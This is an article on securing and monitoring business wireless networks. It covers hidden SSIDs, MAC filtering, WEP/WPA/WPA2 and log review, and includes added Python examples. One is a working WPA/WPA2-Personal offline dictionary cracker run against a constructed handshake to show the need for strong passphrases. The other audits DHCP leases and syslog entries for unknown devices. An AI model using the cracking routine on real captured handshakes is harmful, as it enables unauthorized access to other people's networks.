Monitoring & Preventing Problems on Wireless…
Residential and commercial users alike have come to rely on wireless connectivity more and more. You can hop online at almost any coffee shop, airport or college campus and, in some areas, even outdoors in public parks. There are also thousands of wireless networks that are not meant to be public. Many of those are left unsecured when they should not be, either through poor administration or because company owners do not understand the risks or know how to implement security, and their corporate data is exposed as a result.
A surprisingly large number of wireless networks are not properly secured. Anyone with a laptop can walk around your office or neighborhood and use your Internet connection. Doing this from a car is commonly known as war-driving; on foot, war-walking. War-drivers might use your connection merely to look up directions, an e-mail address or a phone number, but that same open access lets a stranger browse any shares on your servers or workstations and possibly copy, delete or corrupt your data. This kind of breach is a huge headache for administrators, but it can be remedied with some smart purchases and proper administration.
Businesses of different sizes and types use wireless for different purposes. Small companies and large businesses alike use wireless to avoid the cost of wiring an office. Some companies want visitors and guests to have Internet access without reaching the corporate network, and some offer wireless access strictly for customer use. The most important distinction on any of these networks is whether a wireless user can reach corporate or personal data. If they can, the network needs to be secured properly.
For a small office, the variety of wireless products is staggering. Linksys, D-Link and Netgear wireless products are all popular and are sold at a wide variety of local retail stores. Their focus is small office and home usage, and all are easy to set up and properly secure. Medium to large businesses tend to choose more scalable solutions with multiple access points managed under one shared security configuration, so that users who move from one conference room to another roam between access points without re-authenticating or losing their connection. Many companies rely on Cisco and Nortel products to deploy these kinds of solutions.
For unsecured, public networks, make sure no sensitive data is reachable from that network segment at all, and that the administrative passwords on the wireless access points and on the router or firewall are strong. Combination products such as those from Sonicwall or Watchguard integrate a wireless access point into an already well-known firewall, which lets you put the wireless interface into its own DMZ and separate your private business network from the public wireless network at the firewall. At that point you can also restrict the wireless segment to certain outbound traffic only, such as SMTP, POP, HTTP and HTTPS, so that the network is good for little more than checking e-mail and Web surfing (this limits abuse but does not eliminate it, since almost anything can be tunneled over HTTPS). The downside of many firewall-integrated models is cost. Many carry a per-license fee, which makes the purchase harder for a small business owner to justify.
There are various ways to secure a wireless network. One common tactic is to stop broadcasting your SSID, so the network does not show up when people scan for it and can only be joined by someone who already knows the name. This hides the network rather than securing it ("security by obscurity," as they say): the SSID is still sent in the clear in probe and association frames, so anyone sniffing when a legitimate client connects learns it anyway, and clients configured for a hidden network actively probe for it by name wherever they go. When setting up an access point, one of the most important things to do is change the SSID, either to something that helps users know which access point to use or to something that deters them from using it. A friend of mine named his access point "BROKEN-Do_not_use." Many small businesses simply use their company name so it is easy to recognize. While that is convenient for end users, it also makes it simple for a potential attacker to find the door to your corporate network.
One way to secure smaller networks is MAC address filtering, which programs the access point to accept only "known" network devices. The downside is that keeping the list current becomes tedious once you have more than about 15 devices. It is also not foolproof, since many network drivers and devices allow the MAC address to be changed (spoofed). An attacker does need to know an allowed address first, but MAC addresses travel in the clear in every frame header, even on an encrypted network, so anyone sniffing the air can pick one up. If someone really wants in, MAC filtering alone is clearly not enough.
Another option is to turn off DHCP, pick an unusual Class C (/24) range for the network and assign a static IP address to every client. This defeats some of the reasons you would run DHCP in the first place, and it is another thing to keep track of. It is also obscurity rather than security: the addresses in use are visible to anyone sniffing the traffic, so it mainly slows down a casual visitor.
Most wireless security relies on an encryption key, known as a WEP or WPA key. WEP is no longer recommended: it has been broken, and tools such as AirSnort passively collect packets and, once enough have been gathered, recover the WEP key. WPA and its second generation, WPA2, have replaced it. WPA2 upgrades the encryption (AES-based CCMP in place of WPA's TKIP), and most WPA2 access points offer a mixed mode that still admits older WPA-only clients, at the cost of keeping the weaker cipher enabled. Both come in two versions: Personal (also called PSK), in which all clients share one passphrase, and Enterprise, which uses 802.1X with a RADIUS server to authenticate each user individually. With Personal mode the passphrase is the whole secret; a short or guessable one can be cracked offline from a single captured client handshake, so choose a long one. Some devices also offer RADIUS authentication on its own, without WPA; anyone using that should move to WPA2 Enterprise for the additional security.
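As an added example (not from the original article), the following Python script shows why a WPA/WPA2-Personal passphrase has to be strong. The pairwise master key is derived from the passphrase and the SSID with PBKDF2 (4096 rounds of HMAC-SHA1), and an attacker who has sniffed one client's four-way handshake can test candidate passphrases offline against the handshake's message integrity code, since the SSID, MAC addresses and nonces all travel in the clear. The MACs, nonces, EAPOL frame bytes, SSID and wordlist below are constructed for illustration, not captured traffic; the handshake is generated locally from the true passphrase so that there is something to crack.

```python
"""Added example: WPA/WPA2-Personal key derivation and an offline dictionary
attack against a constructed four-way handshake."""
import hashlib
import hmac


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """Pairwise master key for WPA-Personal: PBKDF2-HMAC-SHA1 over the
    passphrase, salted with the SSID, 4096 iterations, 256-bit output."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i)
    for i = 0, 1, ... and keep the first 512 bits."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 128 bits of the PTK: the key confirmation key that authenticates
    EAPOL-Key frames. MACs and nonces are ordered so both sides agree."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, frame_with_mic_zeroed: bytes) -> bytes:
    """WPA2 (AES-CCMP) EAPOL-Key MIC: HMAC-SHA1 over the frame, truncated to 16 bytes."""
    return hmac.new(kck, frame_with_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, frame, captured_mic, wordlist):
    """Try each candidate passphrase: derive PMK -> KCK -> MIC and compare with
    the MIC the client actually sent. Returns the passphrase or None."""
    for candidate in wordlist:
        try:
            pmk = wpa_psk(candidate, ssid)
        except ValueError:  # too short or too long to be a WPA passphrase at all
            continue
        kck = derive_kck(pmk, ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, frame), captured_mic):
            return candidate
    return None


def build_sample_handshake(passphrase: str, ssid: str):
    """Constructed stand-in for a sniffed handshake (not a real capture): fixed
    MACs and nonces and a placeholder EAPOL message-2 body with its MIC field
    zeroed. The MIC is computed as a real client would, so it is a valid target."""
    ap_mac = bytes.fromhex("020000000001")
    sta_mac = bytes.fromhex("020000000002")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    frame = bytes.fromhex("0103007502010a") + b"\x00" * 110
    kck = derive_kck(wpa_psk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return ap_mac, sta_mac, anonce, snonce, frame, eapol_mic(kck, frame)


if __name__ == "__main__":
    ssid = "AcmeCorp"  # constructed; a real SSID is broadcast in beacons anyway
    handshake = build_sample_handshake("acmecorp1", ssid)
    wordlist = ["password", "letmein1", "acmecorp", "acmecorp1", "Welcome123"]
    print("recovered passphrase:", crack_handshake(ssid, *handshake, wordlist))
    print("PMK for 'password' on SSID 'IEEE':", wpa_psk("password", "IEEE").hex())
```

The script recovers the constructed passphrase on the fourth guess. PBKDF2's 4096 iterations make each guess cost a few milliseconds, which slows a wordlist attack but does not stop it; the entropy of the passphrase, not the algorithm, is what holds the door. This is the same computation the dictionary-attack tools of the period perform against a real capture.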
Once you have secured your wireless network, you need to confirm that no one you don't recognize is using it. One of the easiest ways to see which machines have recently used your wireless device is to check your DHCP server's lease table or logs. As long as you recognize every machine name, your wireless network has not been used by strangers. Bear in mind that a visitor who configures a static address never asks for a lease and so never appears there. This kind of monitoring only works for small networks; for medium to large businesses, DHCP alone is too hard to keep track of, and you need more complete logging and monitoring.
One of the best places to start is the logging functionality of your wireless devices themselves. Many small office and home office devices have limited logging, because they lack the onboard memory to store much data, and some cannot send their logs to another device at all. Those that can usually speak syslog, the long-standing UNIX logging protocol; syslogd is the daemon that receives messages from network devices in real time (normally over UDP port 514) and writes them to a file for later investigation, and syslog collectors are available for both UNIX and Windows. There are also many freeware and shareware utilities for parsing through these logs.
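The two checks just described (recognizing the machines in the DHCP lease table, and collecting access-point logs centrally over syslog) as an added Python example that is not part of the original article. The device inventory, the lease file (in the layout dnsmasq's leases file uses) and the syslog lines are constructed samples; the access-point message text is illustrative rather than any vendor's exact format. The script parses the RFC 3164 syslog header (priority, timestamp, host), pulls MAC addresses out of the messages, and flags any lease or log entry for a MAC that is not in the inventory, as well as any known MAC that turns up under an unexpected hostname.

```python
"""Added example: audit DHCP leases and access-point syslog messages against a
list of known devices. All data below is constructed for illustration."""
import re

# Constructed inventory: MAC address -> hostname the device is expected to announce.
KNOWN_DEVICES = {
    "00:11:22:aa:bb:01": "accounting-pc",
    "00:11:22:aa:bb:02": "reception-laptop",
    "00:11:22:aa:bb:03": "ceo-laptop",
}

# Constructed leases in the dnsmasq.leases layout: expiry MAC IP hostname client-id.
# A hostname of "*" means the client announced none.
SAMPLE_LEASES = """\
1163000000 00:11:22:aa:bb:01 192.168.7.10 accounting-pc 01:00:11:22:aa:bb:01
1163000100 00:11:22:aa:bb:02 192.168.7.11 reception-laptop 01:00:11:22:aa:bb:02
1163000200 00:11:22:aa:bb:03 192.168.7.12 h4x0r-book 01:00:11:22:aa:bb:03
1163000300 00:0c:29:de:ad:01 192.168.7.13 * 01:00:0c:29:de:ad:01
"""

# Constructed RFC 3164 lines as an access point might send them to a collector;
# the message text is illustrative, not a specific vendor's format.
SAMPLE_SYSLOG = [
    "<30>Nov  8 14:02:11 ap-lobby hostapd: wlan0: STA 00:11:22:aa:bb:01 IEEE 802.11: associated",
    "<30>Nov  8 14:05:47 ap-lobby hostapd: wlan0: STA 00:0c:29:de:ad:01 IEEE 802.11: associated",
    "garbage line from a device that does not speak RFC 3164",
]

MAC_RE = re.compile(r"(?i)\b([0-9a-f]{2}(?::[0-9a-f]{2}){5})\b")
# <PRI>Mmm dd hh:mm:ss HOSTNAME MSG  (RFC 3164 header; the day is space-padded)
SYSLOG_RE = re.compile(r"^<(\d{1,3})>([A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d) (\S+) (.*)$")
SEVERITY = ["emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"]


def parse_leases(text):
    """Return one dict per lease line; extra fields (client-id) are ignored."""
    leases = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        expiry, mac, ip, hostname = parts[:4]
        leases.append({"expiry": int(expiry), "mac": mac.lower(), "ip": ip, "hostname": hostname})
    return leases


def audit_leases(leases, known=KNOWN_DEVICES):
    """Flag leases for unknown MACs, and known MACs announcing the wrong hostname."""
    findings = []
    for lease in leases:
        expected = known.get(lease["mac"])
        if expected is None:
            findings.append(("unknown-mac", lease["mac"], lease["ip"], lease["hostname"]))
        elif lease["hostname"] != "*" and lease["hostname"] != expected:
            findings.append(("hostname-mismatch", lease["mac"], lease["ip"],
                             f"{lease['hostname']} != {expected}"))
    return findings


def parse_syslog(line):
    """Split an RFC 3164 message into facility, severity, timestamp, host and text."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    pri = int(m.group(1))  # PRI = facility * 8 + severity
    return {"facility": pri >> 3, "severity": SEVERITY[pri & 7],
            "timestamp": m.group(2), "host": m.group(3), "msg": m.group(4)}


def audit_syslog(lines, known=KNOWN_DEVICES):
    """Flag any MAC mentioned by an access point that is not in the inventory,
    and any line the collector could not parse (worth a look in itself)."""
    findings = []
    for line in lines:
        rec = parse_syslog(line)
        if rec is None:
            findings.append(("unparsed", line))
            continue
        for mac in MAC_RE.findall(rec["msg"]):
            if mac.lower() not in known:
                findings.append(("unknown-mac", rec["host"], rec["timestamp"], mac.lower()))
    return findings


if __name__ == "__main__":
    for finding in audit_leases(parse_leases(SAMPLE_LEASES)) + audit_syslog(SAMPLE_SYSLOG):
        print(*finding)
```

Against the sample data this reports the lease for the unknown 00:0c:29:de:ad:01, the inventoried MAC that showed up as "h4x0r-book" instead of "ceo-laptop", the same unknown MAC associating at ap-lobby, and the unparseable line. To use it for real, read the file your syslogd writes (or the DHCP server's own lease file) in place of the constructed samples. The syslog path is what catches the visitor who set a static address and never touched DHCP.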
Wireless technology will keep changing. The ways to secure access will change as well, as weaknesses are found in them or people work out how to get past existing measures. However much a retailer or salesperson tells you the technology is foolproof and secure, the hardware manufacturers continually release new firmware and newer devices with additional security features for a reason. It behooves any network administrator, company owner or technology advisor to stay current on wireless security and to know and understand what threatens their network and how to look for it. For more information, check out www.wi-fi.org.
Chris Lehr is a self-employed technology consultant who has worked with many small to medium-sized businesses, as well as several large multinational corporations. He can be reached at